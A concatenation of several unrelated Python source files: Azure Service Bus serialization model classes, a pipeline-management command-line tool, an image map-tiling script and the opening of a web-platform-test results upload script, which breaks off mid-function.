        'id': {'key': 'id', 'type': 'str'},
        'title': {'key': 'title', 'type': 'str'},
        'updated': {'key': 'updated', 'type': 'iso-8601'},
        'link': {'key': 'link', 'type': '[ResponseLink]'},
        'entry': {'key': 'entry', 'type': '[QueueDescriptionEntry]'},
    }
    # Serialized as an Atom <feed> root element.
    _xml_map = {
        'name': 'feed', 'ns': 'http://www.w3.org/2005/Atom'
    }

    def __init__(
        self,
        **kwargs
    ):
        super(QueueDescriptionFeed, self).__init__(**kwargs)
        self.id = kwargs.get('id', None)
        self.title = kwargs.get('title', None)
        self.updated = kwargs.get('updated', None)
        self.link = kwargs.get('link', None)
        self.entry = kwargs.get('entry', None)
class QueueDescriptionResponse(msrest.serialization.Model):
    """The response from a Queue_Get operation.

    :param id: The URL of the GET request.
    :type id: str
    :param title: The name of the queue.
    :type title: str
    :param published: The timestamp for when this queue was published.
    :type published: str
    :param updated: The timestamp for when this queue was last updated.
    :type updated: str
    :param author: The author that created this resource.
    :type author: ~azure.servicebus.management._generated.models.ResponseAuthor
    :param link: The URL for the HTTP request.
    :type link: ~azure.servicebus.management._generated.models.ResponseLink
    :param content: Contents of a Queue_Get response.
    :type content: ~azure.servicebus.management._generated.models.QueueDescriptionResponseContent
    """

    # msrest serialization map: attribute -> Atom entry child element.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'title': {'key': 'title', 'type': 'str'},
        'published': {'key': 'published', 'type': 'str'},
        'updated': {'key': 'updated', 'type': 'str'},
        'author': {'key': 'author', 'type': 'ResponseAuthor'},
        'link': {'key': 'link', 'type': 'ResponseLink'},
        'content': {'key': 'content', 'type': 'QueueDescriptionResponseContent'},
    }
    # Serialized as an Atom <entry> root element.
    _xml_map = {
        'name': 'entry', 'ns': 'http://www.w3.org/2005/Atom'
    }

    def __init__(
        self,
        **kwargs
    ):
        super(QueueDescriptionResponse, self).__init__(**kwargs)
        self.id = kwargs.get('id', None)
        self.title = kwargs.get('title', None)
        self.published = kwargs.get('published', None)
        self.updated = kwargs.get('updated', None)
        self.author = kwargs.get('author', None)
        self.link = kwargs.get('link', None)
        self.content = kwargs.get('content', None)
class QueueDescriptionResponseContent(msrest.serialization.Model):
    """Contents of a Queue_Get response.

    :param type: Type of content in queue response.
    :type type: str
    :param queue_description: Description of a Service Bus queue resource.
    :type queue_description: ~azure.servicebus.management._generated.models.QueueDescription
    """

    # msrest serialization map: 'type' is an XML attribute, the description
    # a nested element.
    _attribute_map = {
        'type': {'key': 'type', 'type': 'str', 'xml': {'attr': True}},
        'queue_description': {'key': 'QueueDescription', 'type': 'QueueDescription'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(QueueDescriptionResponseContent, self).__init__(**kwargs)
        self.type = kwargs.get('type', None)
        self.queue_description = kwargs.get('queue_description', None)
class ResponseAuthor(msrest.serialization.Model):
    """The author that created this resource.

    :param name: The Service Bus namespace.
    :type name: str
    """

    # msrest serialization metadata (wire-format key / type per attribute).
    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ResponseAuthor, self).__init__(**kwargs)
        # Optional; defaults to None when not supplied.
        self.name = kwargs.get('name', None)
class ResponseLink(msrest.serialization.Model):
    """The URL for the HTTP request.

    :param href: The URL of the GET request.
    :type href: str
    :param rel: What the link href is relative to.
    :type rel: str
    """

    # msrest serialization metadata (wire-format key / type per attribute).
    _attribute_map = {
        'href': {'key': 'href', 'type': 'str', 'xml': {'attr': True}},
        'rel': {'key': 'rel', 'type': 'str', 'xml': {'attr': True}},
    }

    # XML element name and namespace (Atom "link" element).
    _xml_map = {
        'name': 'link', 'ns': 'http://www.w3.org/2005/Atom'
    }

    def __init__(self, **kwargs):
        super(ResponseLink, self).__init__(**kwargs)
        # All attributes are optional; absent keys become None.
        for attr in ('href', 'rel'):
            setattr(self, attr, kwargs.get(attr, None))
class ResponseTitle(msrest.serialization.Model):
    """The title of the response.

    :param type: Type of value.
    :type type: str
    :param title: Contents of the title.
    :type title: str
    """

    # msrest serialization metadata (wire-format key / type per attribute).
    _attribute_map = {
        'type': {'key': 'type', 'type': 'str', 'xml': {'attr': True}},
        'title': {'key': 'title', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ResponseTitle, self).__init__(**kwargs)
        # All attributes are optional; absent keys become None.
        for attr in ('type', 'title'):
            setattr(self, attr, kwargs.get(attr, None))
class ServiceBusManagementError(msrest.serialization.Model):
    """The error response from Service Bus.

    :param code: The service error code.
    :type code: int
    :param detail: The service error message.
    :type detail: str
    """

    # msrest serialization metadata (wire-format key / type per attribute).
    _attribute_map = {
        'code': {'key': 'Code', 'type': 'int'},
        'detail': {'key': 'Detail', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ServiceBusManagementError, self).__init__(**kwargs)
        # All attributes are optional; absent keys become None.
        for attr in ('code', 'detail'):
            setattr(self, attr, kwargs.get(attr, None))
class TopicDescription(msrest.serialization.Model):
    """Description of a Service Bus topic resource.

    :param topic_name: Name of the topic.
    :type topic_name: str
    :param authorization_rules: Authorization rules for resource.
    :type authorization_rules:
     list[~azure.servicebus.management._generated.models.AuthorizationRule]
    :param auto_delete_on_idle: ISO 8601 timeSpan idle interval after which the topic is
     automatically deleted. The minimum duration is 5 minutes.
    :type auto_delete_on_idle: ~datetime.timedelta
    :param default_message_time_to_live: ISO 8601 default message timespan to live value. This is
     the duration after which the message expires, starting from when the message is sent to Service
     Bus. This is the default value used when TimeToLive is not set on a message itself.
    :type default_message_time_to_live: ~datetime.timedelta
    :param duplicate_detection_history_time_window: ISO 8601 timeSpan structure that defines the
     duration of the duplicate detection history. The default value is 10 minutes.
    :type duplicate_detection_history_time_window: ~datetime.timedelta
    :param enable_batched_operations: Value that indicates whether server-side batched operations
     are enabled.
    :type enable_batched_operations: bool
    :param enable_partitioning: A value that indicates whether the topic is to be partitioned
     across multiple message brokers.
    :type enable_partitioning: bool
    :param max_size_in_megabytes: The maximum size of the topic in megabytes, which is the size of
     memory allocated for the topic.
    :type max_size_in_megabytes: long
    :param requires_duplicate_detection: A value indicating if this topic requires duplicate
     detection.
    :type requires_duplicate_detection: bool
    :param status: Status of a Service Bus resource. Possible values include: "Active", "Creating",
     "Deleting", "Disabled", "ReceiveDisabled", "Renaming", "Restoring", "SendDisabled", "Unknown".
    :type status: str or ~azure.servicebus.management._generated.models.EntityStatus
    :param support_ordering: A value that indicates whether the topic supports ordering.
    :type support_ordering: bool
    :param user_metadata: Metadata associated with the topic.
    :type user_metadata: str
    """

    # msrest serialization metadata: wire-format key, type, and XML namespace
    # per attribute (the servicebus/connect namespace on most entries).
    _attribute_map = {
        'topic_name': {'key': 'TopicName', 'type': 'str'},
        'authorization_rules': {'key': 'AuthorizationRules', 'type': '[AuthorizationRule]', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect', 'wrapped': True, 'itemsName': 'AuthorizationRule', 'itemsNs': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'auto_delete_on_idle': {'key': 'AutoDeleteOnIdle', 'type': 'duration', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'default_message_time_to_live': {'key': 'DefaultMessageTimeToLive', 'type': 'duration', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'duplicate_detection_history_time_window': {'key': 'DuplicateDetectionHistoryTimeWindow', 'type': 'duration', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'enable_batched_operations': {'key': 'EnableBatchedOperations', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'enable_partitioning': {'key': 'EnablePartitioning', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'max_size_in_megabytes': {'key': 'MaxSizeInMegabytes', 'type': 'long'},
        'requires_duplicate_detection': {'key': 'RequiresDuplicateDetection', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'status': {'key': 'Status', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'support_ordering': {'key': 'SupportOrdering', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'user_metadata': {'key': 'UserMetadata', 'type': 'str'},
    }

    # XML root element name and namespace for this model.
    _xml_map = {
        'name': 'TopicDescription', 'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'
    }

    def __init__(
        self,
        **kwargs
    ):
        """Initialize the topic description.

        All attributes are optional keyword arguments (keys match the
        parameters documented on the class); missing keys default to None.
        """
        super(TopicDescription, self).__init__(**kwargs)
        self.topic_name = kwargs.get('topic_name', None)
        self.authorization_rules = kwargs.get('authorization_rules', None)
        self.auto_delete_on_idle = kwargs.get('auto_delete_on_idle', None)
        self.default_message_time_to_live = kwargs.get('default_message_time_to_live', None)
        self.duplicate_detection_history_time_window = kwargs.get('duplicate_detection_history_time_window', None)
        self.enable_batched_operations = kwargs.get('enable_batched_operations', None)
        self.enable_partitioning = kwargs.get('enable_partitioning', None)
        self.max_size_in_megabytes = kwargs.get('max_size_in_megabytes', None)
        self.requires_duplicate_detection = kwargs.get('requires_duplicate_detection', None)
        self.status = kwargs.get('status', None)
        self.support_ordering = kwargs.get('support_ordering', None)
        self.user_metadata = kwargs.get('user_metadata', None)
|
#!/usr/bin/env python
# This is a temporary version of ariadne as I change argument handling
import sys
import os
import ariadne
import argparse
#from ariadne import plugin
#from ariadne import tools
#from ariadne import pipeline
#from ariadne import deftools
#from ariadne import argparse
# Convenience aliases for the ariadne submodules used throughout this script.
plugin = ariadne.plugin
tools = ariadne.tools
pipeline = ariadne.pipeline
deftools = ariadne.deftools

# ariadne.py -- command line interface for ariadne.
def print_usage():
    """Print the top-level usage statement for the ariadne CLI."""
    usage_lines = (
        "Usage: ariadne.py <command> [args]",
        "Manage, test, benchmark, and run software pipelines.",
        "\nWhere <command> is one of the following:",
        "\tdataset \tManage, fetch, validate, and unpack datasets.",
        "\ttest \tRun tests on a pipeline.",
        "\tbenchmark\tBenchmark a pipeline.",
        "\tpipeline \tRun and manage pipelines.",
        "\tplugins \tList all available plugins.",
    )
    for usage_line in usage_lines:
        print(usage_line)
def print_dataset_usage():
    """Print the usage statement for the dataset subcommand."""
    print("Usage: ariadne.py dataset <action> [datasetname] [destination]")
    print("\nWhere <action> is one of the following:")
    print("\tfetch\tFetch, unpack, and validate a dataset.")
    print("\tlist \tShow all known dataset definitions.")
    # Fixed typo in the user-facing text: "datset" -> "dataset".
    print("\tshow \tShow information about a dataset.")
def print_pipeline_usage():
    """Print the usage statement for the pipeline subcommand."""
    for usage_line in (
        "Usage: ariadne.py pipeline <action> <pipelinename> [pipeline args]",
        "\nWhere <action> is one of the following:",
        "\trun \tRun the pipeline.",
        "\tcheckdepends\tEnsure that all of the pipeline's modules are present.",
    ):
        print(usage_line)
def print_test_usage():
    """Print the usage statement for the test subcommand."""
    usage = "Usage: ariadne.py test <pipelinename> <test definition file> [args]"
    print(usage)
def print_benchmark_usage():
    """Print the usage statement for the benchmark subcommand."""
    for usage_line in (
        "Usage: ariadne.py benchmark <pipelinename> [pipeline args]",
        "\nWhere [pipeline args] is a list of all arguments to send",
        "\tto the pipeline.",
    ):
        print(usage_line)
def build_arg_dict(arg_list):
    """Build a {name: value} dict from a list of 'name=value' strings.

    Splits on the FIRST '=' only, so values may themselves contain '='
    (e.g. "expr=a=b" -> {'expr': 'a=b'}); the original split on every '='
    and silently truncated such values.  A token with no '=' still raises
    IndexError, matching the original behavior.
    """
    args = {}
    for token in arg_list:
        parts = token.split('=', 1)
        args[parts[0]] = parts[1]
    return args
def list_datasets(path):
    """Lists information for all datasets present in the given path.

    Scans `path` for '*.dataset' definition files and prints one
    "name: description" line per dataset found.
    """
    dirlisting = os.listdir(path)
    for entry in dirlisting:
        if tools.get_extension(entry) == ".dataset":
            dataset_contents = deftools.parse_file(path + "/" + entry)
            ds_name = ""
            ds_descrip = ""
            # NOTE(review): the bare excepts below deliberately fall back to
            # placeholder text when a field is missing, but they also hide
            # any unrelated error raised by deftools.search — consider
            # narrowing to the specific exception type.
            try:
                ds_name = deftools.search(dataset_contents, "name")[0]
            except:
                ds_name = "None"
            try:
                ds_descrip = deftools.search(dataset_contents, "description")[0]
            except:
                ds_descrip = "No description found."
            print("%s: %s" % (ds_name, ds_descrip))
def run_dataset(action, dataset_name, confdict):
    """Performs actions related to fetching, unpacking, and managing datasets.

    'action' is one of "fetch", "list" or "show"; anything else prints the
    usage text.  'confdict' must map 'datadir' to a list whose first entry
    is the destination directory for fetched datasets.

    NOTE(review): main() passes argparse positionals that default to None
    (not ""), so the action==""/dataset_name=="" guard never fires for
    missing arguments — confirm whether it should also test for None.
    """
    if action == "" and dataset_name == "":
        print_dataset_usage()
        return
    dataset_destination = confdict['datadir'][0]
    # Determine where, exactly, this dataset is:
    # prefer the default dataset directory, fall back to the cwd.
    fullpath = "%s/%s.dataset" % (tools.get_default_dataset_dir(), dataset_name)
    if not tools.file_exists(fullpath):
        fullpath = "./%s.dataset" % dataset_name
    dataset_filename = fullpath
    if action == "fetch":
        if not tools.file_exists(fullpath):
            print("ERROR: Dataset " + dataset_name + " does not exist either in ./ or %s."
                  % tools.get_default_dataset_dir())
            return
        dataset_contents = deftools.parse_file(dataset_filename)
        dataset_type = deftools.search(dataset_contents, "type")[0]
        if len(dataset_type) == 0:
            print("ERROR: Dataset has unspecified type. Cannot handle.")
            exit(2)
        # Delegate the actual fetch/unpack to the plugin registered for
        # this dataset type.
        dataset_handler = plugin.get_can_handle(dataset_type)
        if dataset_handler == None:
            print("Could not find a plugin to handle dataset type: %s" % dataset_type)
            return
        h = dataset_handler(dataset_filename)
        h.fetch(dataset_destination)
        h.unpack(dataset_destination)
    elif action == "list":
        # Show dataset definitions from both the default directory and cwd.
        list_datasets(tools.get_default_dataset_dir())
        list_datasets(".")
    elif action == "show":
        if not tools.file_exists(fullpath):
            print("ERROR: Dataset %s does not exist." % dataset_name)
            return
        dataset_contents = deftools.parse_file(fullpath)
        dataset_type = deftools.search(dataset_contents, "type")[0]
        handler = None
        dataset_handler = plugin.get_can_handle(dataset_type)
        print("Dataset: " + dataset_name)
        print("Type: " + deftools.search(dataset_contents, "type")[0])
        if dataset_handler == None:
            print("No plugin found to handle this type of dataset.")
        else:
            print("Handler plugin name: " + dataset_handler.name)
    else:
        print_dataset_usage()
        exit(0)
def run_plugins():
    """List all currently installed plugins in two aligned columns.

    Prints a "Name" / "Type" header and one row per entry in
    plugin.plugin_list, where each entry is a (plugin_class, type_string)
    pair.
    """
    print("List of plugins:")
    o = sys.stdout
    # Column width: longest plugin name plus three spaces of padding.
    longest_len = 0
    for p in plugin.plugin_list:
        longest_len = max(longest_len, len(str(p[0].name)))
    longest_len += 3
    # str.ljust replaces the original hand-rolled space-padding loops;
    # output is byte-identical.
    o.write("Name".ljust(longest_len))
    o.write("Type\n")
    for p in plugin.plugin_list:
        o.write(str(p[0].name).ljust(longest_len) + p[1] + '\n')
def run_pipeline(action, pipe_name, args, confdict):
    """Perform actions related to running and managing pipelines.

    'action' is "run" (execute with 'name=value' args) or "checkdepends"
    (verify the pipeline's modules are present); anything else is a no-op.
    """
    if action == "run":
        pipe = pipeline.Pipeline(pipe_name + ".pipeline")
        pipe.run(build_arg_dict(args))
    elif action == "checkdepends":
        pipe = pipeline.Pipeline(pipe_name + ".pipeline")
        pipe.check_dependencies()
def run_test(pipe_name, test_filename, confdict):
    """Performs actions related to testing plugins and pipelines.

    Reads a test-definition file where each line has the form
    "<test_name> key=value key=value ..." and passes the resulting list of
    argument dicts to the pipeline's validate().
    """
    if pipe_name == "" or test_filename == "":
        print_test_usage()
        return
    f = open(test_filename, 'r')
    contents = f.read()
    f.close()
    lines = contents.splitlines()
    arglist = []
    for l in lines:
        # First token is the test name; the rest are key=value pairs.
        linetoks = l.split()
        name = linetoks[0]
        argdict = {'test_name': name}
        for t in linetoks[1:]:
            pair = t.split('=')
            argdict[pair[0]] = pair[1]
        print(argdict)
        arglist.append(argdict)
    p = pipeline.Pipeline(pipe_name + ".pipeline")
    # BUG(review): `step` is not defined anywhere in this function or module,
    # so this line raises NameError when reached.  Confirm the intended
    # second argument of validate() and fix.
    p.validate(arglist, step)
def run_benchmark(pipe_name, args, confdict):
    """Performs actions related to benchmarking plugins and pipelines.

    'pipe_name' names the pipeline to benchmark; 'args' is a list of
    'name=value' strings forwarded to the pipeline's benchmark().
    """
    if pipe_name == "":
        print_benchmark_usage()
        return
    # BUG FIX: the original re-assigned pipe_name = args[0] here, clobbering
    # the pipeline name (which main() already passes separately as optarg1)
    # with the first pipeline argument, and then fed that same
    # non-'name=value' token to build_arg_dict.
    argdict = build_arg_dict(args)
    p = pipeline.Pipeline(pipe_name + ".pipeline")
    p.benchmark(argdict)
def run_plugin(runstr, plugin_name, plugin_dir, plugin_args, confdict):
    """Runs an individual plugin by the method specified.

    'runstr' selects the mode: "runplugin" (run), "trainplugin" (train) or
    "testplugin" (test, then exit with status 0 on success).  'plugin_args'
    is a list of 'name=value' strings passed to the plugin.
    """
    if plugin_name == "":
        # BUG(review): print_run_plugin_usage is not defined in this module,
        # so reaching this branch raises NameError — define it or reuse
        # print_usage().
        print_run_plugin_usage()
        return
    tools.init_plugins(plugin_dir)
    pclass = plugin.search_plugins(plugin_name)
    if pclass == None:
        print("ERROR: Plugin %s could not be found!" % plugin_name)
        return
    argdict = build_arg_dict(plugin_args)
    pl = pclass()
    if runstr == "runplugin":
        pl.run(argdict)
    elif runstr == "trainplugin":
        # NOTE(review): the bare except hides the actual failure cause;
        # consider logging the exception.
        try:
            pl.train(argdict)
        except:
            print("ERROR: Couldn't train plugin: %s" % plugin_name)
    elif runstr == "testplugin":
        retv = 0
        try:
            retv = pl.test()
        except:
            print("ERROR: Couldn't test plugin: %s" % plugin_name)
        # Exit status 0 when the plugin test returned truthy, 1 otherwise.
        exit(not retv)
def main(argv):
    """Entry point and dispatcher for the ariadne cli.

    Initializes plugins, loads (or generates) the configuration file, then
    dispatches to the run_* helper matching the first CLI argument.
    """
    # These two are mostly for the benefit of plugins.
    sys.path.append(".")
    sys.path.append(tools.get_base_dir() + "/ariadne")
    tools.init_plugins()
    if len(argv) == 1:
        print_usage()
        exit()
    # Now attempt to read the configuration file:
    conftoks = []
    try:
        conftoks = deftools.parse_file(tools.get_default_config_file())
    except:
        # Try to write one instead:
        print("Generating default config file at %s..." % (tools.get_default_config_file()))
        conffile = open(tools.get_default_config_file(), 'w')
        tools.prep_default_config_file(conffile)
        conffile.close()
        conftoks = tools.get_default_conf_toks()
    confdict = deftools.make_dict(conftoks)
    plugin.set_config(confdict)
    # Load any plugins specified in the configuration:
    # (missing 'plugindirs' key is silently ignored)
    try:
        pdirs = confdict['plugindirs']
        for p in pdirs:
            tools.init_plugins(p)
            print("Loaded plugins from: %s" % p)
    except:
        pass
    # Positional CLI layout: <cmd> [optarg1] [optarg2] [moreargs...].
    # NOTE(review): missing optargs default to None (not ""), so the
    # ==""-style guards in the run_* helpers never trigger, and the
    # optarg2!="" test below is True for None — confirm intended behavior.
    parser = argparse.ArgumentParser(description="Manage, test, and benchmark software pipelines.")
    parser.add_argument("cmd", help=argparse.SUPPRESS)
    parser.add_argument("optarg1", nargs="?")
    parser.add_argument("optarg2", nargs="?")
    parser.add_argument("moreargs", nargs="*")
    results = parser.parse_args()
    cmd = results.cmd
    if cmd == "dataset":
        run_dataset(results.optarg1, results.optarg2, confdict)
    elif cmd == "test":
        run_test(results.optarg1, results.optarg2, confdict)
    elif cmd == "benchmark":
        # Fold optarg2 back into the pipeline-argument list.
        if results.optarg2 != "":
            results.moreargs.append(results.optarg2)
        run_benchmark(results.optarg1, results.moreargs, confdict)
    elif cmd == "pipeline":
        run_pipeline(results.optarg1, results.optarg2, results.moreargs, confdict)
    elif cmd == "plugins":
        run_plugins()
    elif cmd == "runplugin" or cmd == "trainplugin":
        run_plugin(cmd, results.optarg1, results.optarg2, results.moreargs, confdict)

if __name__ == "__main__":
    main(sys.argv)
|
#!/usr/bin/env python3
import cv2 as cv
import json
import math
import numpy as np
import os
import sys
from requests.utils import requote_uri
from geojson import FeatureCollection, Feature, Polygon, dumps
# Tiling configuration: output dir, tile geometry, zoom range, auto-placement
# spacing — all read from config.json in the working directory.
config = json.load(open("config.json", "r"))
target = config.get('target')
tilesize = config.get('tilesize')
maxzoom = config.get('maxzoom')
spacing = config.get('spacing')
tile_format = '.webp'
# Lat/lon extents used to map pixel coordinates onto the virtual map.
LLBOUNDS = [-180.0, 180.0, -180.0, 180.0]
# Optional CLI filter: only sources whose filename contains this substring
# get their tiles (re)rendered.
match = None
if len(sys.argv) >= 2:
    match = sys.argv[1]

# pixel coordinates as x,y
# tile coordinates as t,u
def xy_to_latlon(x, y, zoom):
    """Convert pixel coordinates at `zoom` to (lat, lon) map coordinates.

    Uses the module-level `tilesize` and `LLBOUNDS`; x maps (negated) onto
    LLBOUNDS[1], y onto LLBOUNDS[3].
    """
    half_world = float(math.pow(2, zoom - 1) * tilesize)
    lat = x / (-half_world) * LLBOUNDS[1]
    lon = y / half_world * LLBOUNDS[3]
    return lat, lon
# --- Main layout & tiling loop -------------------------------------------
# For every configured source image: resolve its (possibly relative)
# placement, record a GeoJSON feature for its footprint, then render it
# into the tile pyramid from `imgzoom` down to zoom 1.
# NOTE(review): relative placements ("+", "=", ">") read prev_* state, so
# the first source must be absolutely placed or this raises TypeError.
features = []
prev_x, prev_y, prev_zoom = None, None, None
ymax = -1e10
for source in config.get('sources', []):
    if len(source) < 7:
        continue
    filename, xrel, yrel, imgzoom, title, family, date, location, comment, href = source[:10]
    # auto-place after spacing: offset from the previous image's far edge,
    # rescaled from the previous zoom level to this one.
    if xrel == "+":
        xrel = prev_x + int((2**imgzoom) * spacing)
        xrel = xrel * (2**(imgzoom - prev_zoom))
        print("CALCULATED NEW X FROM", prev_x, " AS ", xrel)
    if yrel == "+":
        yrel = prev_y + int((2**imgzoom) * spacing)
        yrel = yrel * (2**(imgzoom - prev_zoom))
        print("CALCULATED NEW Y FROM", prev_y, " AS ", yrel)
    print("Processing ", filename)
    source_im = cv.imread(filename, cv.IMREAD_UNCHANGED)
    # NOTE(review): OpenCV shapes are (rows, cols) — w,h here receives
    # (height, width); used consistently below, but the names are swapped.
    w, h = source_im.shape[:2]
    # auto-place centered on the previous image's vertical center
    if yrel == "=":
        yrel = prev_yc * (2**(imgzoom - prev_zoom)) - int(h / 2)
        print("CALCULATED NEW Y FROM CENTER", prev_yc, " AS ", yrel)
    # auto-place right of previous column
    elif yrel == ">":
        yrel = (ymax + 1.0 / 100) * (2**imgzoom)
        print("CALCULATED NEW Y FROM YMAX", ymax, " AS ", yrel, imgzoom)
    else:
        ymax = yrel
    # might be off by a factor off two, to be verified.
    if title:
        print(title)
    print("PIXEL COORDINATES ", xrel, yrel, xrel + w, yrel + h)
    # Record the image footprint as a GeoJSON polygon with its metadata.
    left, top = xy_to_latlon(xrel, yrel, imgzoom)
    right, bottom = xy_to_latlon(xrel + w, yrel + h, imgzoom)
    poly = Polygon([[(top, left), (top, right), (bottom, right), (bottom, left), (top, left)]])
    feat = Feature(geometry=poly, properties={
        "title": title,
        "family": family,
        "date": date,
        "loc": location,
        "comment": comment,
        "href": href
    })
    features.append(feat)
    #if imgzoom < maxzoom:
    #    factor = math.pow(2, maxzoom-imgzoom)
    #    source_im = cv.resize(source_im, (0, 0), fx=factor, fy=factor)
    # FIXME: memory issues when blowing up - add maxzoom (and minzoom) to define display range
    # calculate outer borders of previous item to calculate relative positions
    prev_x = xrel + w
    prev_y = yrel + h
    prev_yc = yrel + h / 2
    prev_yr = float(yrel + h) / (2**imgzoom)
    if prev_yr > ymax:
        ymax = prev_yr
        print("NEW YMAX ", ymax, "FROM", yrel, h)
    prev_zoom = imgzoom
    # Skip rendering (but keep the feature) unless the filename matches the
    # optional CLI filter.
    if match and not match in filename:
        continue
    zoom = imgzoom
    w = h = 256  # just to pass the first check
    # Walk down the pyramid, halving the source image at each level.
    while zoom > 1 and w > 2 and h > 2:
        if zoom <= maxzoom:
            # relative zero (center) at the defined zoom level
            x0 = math.floor(tilesize * math.pow(2, zoom - 1))
            y0 = math.floor(tilesize * math.pow(2, zoom - 1))
            # image coordinates at that zoom level
            xi, yi = x0 + xrel, y0 + yrel
            # image size
            # NOTE: source images should always be transparent png, or overlaps will be covered
            w, h = source_im.shape[:2]
            wt = math.ceil(w / tilesize)
            ht = math.ceil(h / tilesize)
            # first tile to consider
            t0 = math.floor(xi / tilesize)
            u0 = math.floor(yi / tilesize)
            # top left of the considered tile
            xA = t0 * tilesize
            yA = u0 * tilesize
            # offset of the image to the first tile
            off_x = xi - xA
            off_y = yi - yA
            off_t = math.floor(off_x / tilesize)
            off_u = math.floor(off_y / tilesize)
            # CHECK: adjust range to actually cover the location of the translated image
            folders = {}
            for tx in range(0, wt + 1):  # TODO: try t0-t0+wt
                for ty in range(0, ht + 1):
                    # read current background tile
                    folder = target + "tiles/" + str(zoom) + "/" + str(u0 + ty)
                    tile_url = folder + "/" + str(t0 + tx) + tile_format
                    #print("Loading "+tile_url)
                    white_tile = np.zeros([tilesize, tilesize, 4], dtype=np.uint8)
                    #white_tile.fill(255)
                    bg = cv.imread(tile_url, cv.IMREAD_UNCHANGED)
                    if bg is None:
                        # No existing tile yet: start from a transparent one.
                        bg = white_tile.copy()
                    bg = cv.cvtColor(bg, cv.COLOR_BGR2BGRA)
                    # cut relevant section of source_im
                    from_x = max(0, tx * tilesize - off_x)
                    from_y = max(0, ty * tilesize - off_y)
                    to_x = min(w, (tx + 1) * tilesize - off_x)
                    to_y = min(h, (ty + 1) * tilesize - off_y)
                    cutout = source_im[from_x:to_x, from_y:to_y]
                    # correct location of background
                    dest_x = max(0, off_x - tx * tilesize)
                    dest_y = max(0, off_y - ty * tilesize)
                    dto_x = dest_x + to_x - from_x
                    dto_y = dest_y + to_y - from_y
                    # paste cutout onto background
                    # TODO: actually paste, not overwrite
                    # eg. overwrite white_tile, then merge with bg
                    try:
                        bg[dest_x:dto_x, dest_y:dto_y] = cutout
                    except:
                        # Shape mismatches at the borders are silently skipped.
                        continue
                    #print("SOMETHING FAILED")
                    #cv.imshow('BG',bg)
                    #print("CUTOUT SIZE:", (from_x, to_x, from_y, to_y))
                    #print("FROM Y:", (from_y))
                    #print("TO Y:", (to_y))
                    #print("H:", h)
                    #cv.waitKey(1)
                    #sys.exit(1)
                    # then write that tile to file
                    if not folder in folders:
                        #print("Writing ",folder)
                        try:
                            os.makedirs(folder)
                            folders[folder] = True
                        except:
                            pass
                    cv.imwrite(tile_url, bg)
        # Move one level up the pyramid: halve coordinates and the image.
        zoom = zoom - 1
        xrel = math.floor(xrel / 2)
        yrel = math.floor(yrel / 2)
        source_im = cv.resize(source_im, (0, 0), fx=0.5, fy=0.5)
        w = math.floor(w / 2)
        h = math.floor(h / 2)

# Write the collected footprints as GeoJSON for the map frontend.
fc = FeatureCollection(features)
fp = open(target + "features.geojson", "w")
fp.write(dumps(fc))
fp.close()
def species_link(s):
    """Return an HTML list item linking to the map entry for species name *s*."""
    encoded = requote_uri(s)
    return '<li><a href="https://setzkasten.relet.net#?{}">{}</a></li>'.format(encoded, s)
# Build the alphabetical species index page from the collected features.
# NOTE(review): the closing tags in the template are malformed ("<ul>",
# "<html>" instead of "</ul>", "</html>") — browsers tolerate it, but
# consider fixing the template string.
species_list = map(lambda f: f.properties.get('title'), features)
species_links = "\n".join(map(species_link, sorted(species_list)))
fi = open(target + "species_index.html", "w")
fi.write("<html><body><ul>{}<ul></body><html>".format(species_links))
fi.close()
|
#!/usr/bin/env python
# Copyright 2018 The WPT Dashboard Project. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import json
import gzip
import logging
import os
import platform
import re
import requests
import shutil
import subprocess
import tempfile
def main(raw_results_directory, platform_id, browser_name, browser_version,
         os_name, os_version, wpt_revision, wpt_revision_date, bucket_name,
         notify_url, notify_secret):
    '''Consolidate the data generated by the WPT CLI (via its `--log-wptreport`
    flag) into a set of gzip-encoded JSON files, upload those files to a Google
    Cloud Storage bucket, and send an HTTP request to a given web server to
    signal that this operation has occurred.'''
    log_format = '%(asctime)s %(levelname)s %(name)s %(message)s'
    logging.basicConfig(level='INFO', format=log_format)
    logger = logging.getLogger('upload-results')
    raw_results_files = [
        os.path.join(raw_results_directory, filename)
        for filename in os.listdir(raw_results_directory)
    ]
    os_version = expand_os_version(os_name, os_version)
    # The current implementation of https://wpt.fyi does not render complete
    # SHA sums gracefully. Truncate the value in order to satisfy the needs of
    # the interface.
    wpt_revision = wpt_revision[:10]
    summary = summarize(raw_results_files)
    temp_dir = tempfile.mkdtemp()
    try:
        # Stage the summary and the per-test results in a scratch directory,
        # then mirror it to the bucket in one rsync.
        summary_file_name = '%s-summary.json.gz' % platform_id
        logger.info('Writing %s to local filesystem', summary_file_name)
        write_gzip_json([temp_dir, summary_file_name], summary)
        full_results_dir = os.path.join(temp_dir, platform_id)
        logger.info('Writing %s results to local filesystem', len(summary))
        for test_filename, raw_result in each_result(raw_results_files):
            write_gzip_json([full_results_dir, test_filename], raw_result)
        upload_url = 'gs://%s/%s' % (bucket_name, wpt_revision)
        download_url = 'https://storage.googleapis.com/%s/%s' % (
            bucket_name, wpt_revision)
        logger.info('Uploading results to %s', upload_url)
        upload(temp_dir, upload_url)
        logger.info('Upload successful.')
    finally:
        # Always remove the scratch directory, even if the upload failed.
